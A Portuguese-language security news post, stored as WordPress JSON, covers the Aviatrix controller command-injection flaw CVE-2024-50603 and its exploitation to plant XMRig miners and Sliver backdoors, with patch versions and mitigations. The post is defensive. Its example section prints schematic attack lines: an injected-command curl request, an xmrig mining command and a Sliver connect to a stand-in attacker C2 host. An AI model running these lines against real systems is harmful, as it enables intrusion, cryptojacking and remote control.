{"id":21573,"date":"2025-01-13T19:10:26","date_gmt":"2025-01-13T22:10:26","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=21573"},"modified":"2025-01-13T19:24:48","modified_gmt":"2025-01-13T22:24:48","slug":"vulnerabilidade-critica-no-controlador-aviatrix-possibilita-implantar-backdoors-e-mineradores-de-criptomoedas","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2025\/01\/exploits\/vulnerabilidade-critica-no-controlador-aviatrix-possibilita-implantar-backdoors-e-mineradores-de-criptomoedas\/","title":{"rendered":"Aviatrix possibilita implantar backdoors e mineradores de criptomoedas"},"content":{"rendered":"\n<p>Hackers exploram vulnerabilidade cr\u00edtica no controlador Aviatrix para implantar backdoors e mineradores de criptomoedas<\/p>\n<p style=\"text-align: justify;\">No cen\u00e1rio da seguran\u00e7a cibern\u00e9tica, vulnerabilidades cr\u00edticas em plataformas de rede em nuvem representam um alto risco para organiza\u00e7\u00f5es. Recentemente, a falha CVE-2024-50603 no controlador Aviatrix ganhou destaque ap\u00f3s ser explorada ativamente por hackers para implantar backdoors e mineradores de criptomoedas. Este artigo detalha como essa vulnerabilidade funciona, seus impactos e as melhores pr\u00e1ticas para mitiga\u00e7\u00e3o.<\/p>\n<p>\u00a0<\/p>\n<p><strong>O que \u00e9 o Aviatrix\u00a0<\/strong><\/p>\n<p style=\"text-align: justify;\">O controlador Aviatrix\u00a0 \u00e9 uma plataforma que facilita a gest\u00e3o de redes em nuvem para empresas, permitindo a integra\u00e7\u00e3o e o controle centralizado de diferentes ambientes de nuvem, como AWS, Azure e Google Cloud.<\/p>\n<p style=\"text-align: justify;\">Por ser amplamente utilizado, qualquer falha nessa plataforma pode comprometer n\u00e3o apenas a infraestrutura da organiza\u00e7\u00e3o, mas tamb\u00e9m a seguran\u00e7a de dados sens\u00edveis e opera\u00e7\u00f5es cr\u00edticas.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Detalhes da vulnerabilidade CVE-2024-50603<\/strong><\/p>\n<p><strong>Gravidade e impacto<\/strong><\/p>\n<ul>\n<li><strong>Pontua\u00e7\u00e3o CVSS<\/strong>: 10,0 (M\u00e1xima)<\/li>\n<li><strong>Tipo de Explora\u00e7\u00e3o<\/strong>: Execu\u00e7\u00e3o Remota de C\u00f3digo (RCE)<\/li>\n<li><strong>Causa<\/strong>: Falha na sanitiza\u00e7\u00e3o de entradas fornecidas pelo usu\u00e1rio em endpoints da API.<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Essa vulnerabilidade permite que hackers injetem comandos maliciosos diretamente no sistema operacional da plataforma, abrindo portas para a\u00e7\u00f5es n\u00e3o autorizadas como:<\/p>\n<ul>\n<li>Implanta\u00e7\u00e3o de mineradores de criptomoedas (usando ferramentas como XMRig);<\/li>\n<li>Introdu\u00e7\u00e3o de backdoors para controle remoto do sistema;<\/li>\n<li>Movimenta\u00e7\u00e3o lateral no ambiente de nuvem da v\u00edtima.<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>Corre\u00e7\u00f5es dispon\u00edveis<\/strong><\/p>\n<p style=\"text-align: justify;\">A falha foi corrigida nas vers\u00f5es <strong>7.1.4191<\/strong> e <strong>7.2.4996<\/strong>. Portanto, a aplica\u00e7\u00e3o imediata desses patches \u00e9 altamente recomendada.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Exploits no mundo real<\/strong><\/p>\n<p>Pesquisas da Wiz revelaram incidentes envolvendo:<\/p>\n<p><strong>1. Uso de mineradores de criptomoedas<\/strong>:<\/p>\n<p>Ap\u00f3s obter acesso inicial, os atacantes configuram o XMRig para minerar Monero, utilizando os recursos computacionais da v\u00edtima.<\/p>\n<p>\u00a0<strong style=\"font-size: revert; color: initial;\">2. Implanta\u00e7\u00e3o da ferramenta de C2 Sliver<\/strong><span style=\"font-size: revert; color: initial;\">:<\/span><\/p>\n<p>Hackers utilizam o Sliver para estabelecer persist\u00eancia, permitindo que continuem explorando o ambiente.<\/p>\n<p><strong style=\"font-size: revert; color: initial;\">3. Escalada de privil\u00e9gios<\/strong><span style=\"font-size: revert; color: initial;\">:<\/span><\/p>\n<p>Nos ambientes de AWS, o controlador Aviatrix configura permiss\u00f5es que podem ser exploradas para acessar n\u00edveis administrativos no plano de controle da nuvem.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Como os hackers exploraram a falha<\/strong><\/p>\n<p style=\"text-align: justify;\">O exploit dessa vulnerabilidade \u00e9 facilitado pela exist\u00eancia de um <strong>Proof of Concept (PoC)<\/strong> p\u00fablico, o que permite que at\u00e9 mesmo agentes de amea\u00e7as menos experientes utilizem o c\u00f3digo para realizar ataques.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Exemplo de ataque<\/strong><\/p>\n<p><strong>1. Inje\u00e7\u00e3o de comandos maliciosos<\/strong>:<\/p>\n<p style=\"text-align: left;\">curl -X POST &#8220;https:\/\/victim-controller\/api\/vulnerable-endpoint&#8221; \\ -d &#8220;command=inject-malicious-command&#8221;<\/p>\n<p style=\"text-align: justify;\">Neste exemplo, um invasor pode enviar comandos que o controlador Aviatrix executa sem valida\u00e7\u00e3o adequada.<\/p>\n<p>\u00a0<\/p>\n<p><strong>2. Minera\u00e7\u00e3o de criptomoedas<\/strong>: Ap\u00f3s comprometer o sistema, o XMRig \u00e9 instalado e configurado para minerar Monero:<\/p>\n<p>sudo apt-get install -y xmrig<\/p>\n<p>xmrig &#8211;url pool.monero.hashvault.pro:443 &#8211;user wallet_address<\/p>\n<p>\u00a0<\/p>\n<p><strong>3.<\/strong> <strong>Backdoor para Persist\u00eancia<\/strong>: Usando o Sliver, o atacante ganha controle remoto:<\/p>\n<p>.\/sliver-client connect attacker-c2-server<\/p>\n<p>\u00a0<\/p>\n<p><strong>Recomenda\u00e7\u00f5es de seguran\u00e7a<\/strong><\/p>\n<p><strong>1. Aplique os patches imediatamente<\/strong><\/p>\n<p>Certifique-se de atualizar para as vers\u00f5es corrigidas:<\/p>\n<ul>\n<li><strong>7.1.4191<\/strong> ou <strong>7.2.4996<\/strong>.<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>2. Restrinja o acesso ao controlador Aviatrix\u00a0<\/strong><\/p>\n<ul>\n<li>Bloqueie o acesso p\u00fablico ao controlador.<\/li>\n<li>Permita acesso apenas por redes confi\u00e1veis e usando VPN.<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>3. Monitore atividades an\u00f4malas<\/strong><\/p>\n<p style=\"text-align: justify;\">Implemente sistemas de detec\u00e7\u00e3o de intrus\u00e3o (IDS) e monitore logs para identificar comportamentos fora do padr\u00e3o.<\/p>\n<p>\u00a0<\/p>\n<p><strong>4. Reforce a seguran\u00e7a na nuvem<\/strong><\/p>\n<ul>\n<li>Audite permiss\u00f5es em seus ambientes de nuvem.<\/li>\n<li>Restrinja o uso de credenciais administrativas e habilite autentica\u00e7\u00e3o multifator (MFA).<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><strong>5. Desative APIs n\u00e3o utilizadas<\/strong><\/p>\n<p>Se determinados endpoints da API n\u00e3o forem necess\u00e1rios, desative-os para reduzir a superf\u00edcie de ataque.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Conclus\u00e3o<\/strong><\/p>\n<p style=\"text-align: justify;\">A vulnerabilidade CVE-2024-50603 no Aviatrix destaca a necessidade de vigil\u00e2ncia constante em seguran\u00e7a cibern\u00e9tica. Explora\u00e7\u00f5es como a implanta\u00e7\u00e3o de mineradores de criptomoedas e backdoors representam um risco significativo para empresas, especialmente em ambientes de nuvem.<\/p>\n<p style=\"text-align: justify;\">Aplicar patches rapidamente, restringir acessos desnecess\u00e1rios e monitorar atividades suspeitas s\u00e3o a\u00e7\u00f5es essenciais para proteger suas opera\u00e7\u00f5es. Como exemplo, este incidente refor\u00e7a a import\u00e2ncia de manter todos os componentes de infraestrutura atualizados e de realizar auditorias regulares.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Dica para desenvolvedores e administradores de sistemas<\/strong><\/p>\n<p style=\"text-align: justify;\">Automatize as atualiza\u00e7\u00f5es de seguran\u00e7a e monitore vulnerabilidades conhecidas em ferramentas como o controlador Aviatrix\u00a0 para evitar ser a pr\u00f3xima v\u00edtima.<\/p>\n<p>\u00a0<\/p>\n<p>Fonte e imagens: <a href=\"https:\/\/thehackernews.com\/2025\/01\/hackers-exploit-aviatrix-controller.html\" target=\"_blank\" rel=\"noopener\">https:\/\/thehackernews.com\/2025\/01\/hackers-exploit-aviatrix-controller.html<\/a><\/p>\n\n\n","protected":false},"excerpt":{"rendered":"<p>Hackers exploram vulnerabilidade cr\u00edtica no controlador Aviatrix para implantar backdoors e mineradores de criptomoedas No cen\u00e1rio da seguran\u00e7a cibern\u00e9tica, vulnerabilidades cr\u00edticas em plataformas de rede em nuvem representam um alto risco para organiza\u00e7\u00f5es. Recentemente, a falha CVE-2024-50603 no controlador Aviatrix ganhou destaque ap\u00f3s ser explorada ativamente por hackers para implantar backdoors e mineradores de criptomoedas. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":21576,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21,105],"tags":[],"class_list":["post-21573","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits","category-noticias"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21573","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=21573"}],"version-history":[{"count":12,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21573\/revisions"}],"predecessor-version":[{"id":21595,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21573\/revisions\/21595"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/21576"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=21573"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=21573"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=21573"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}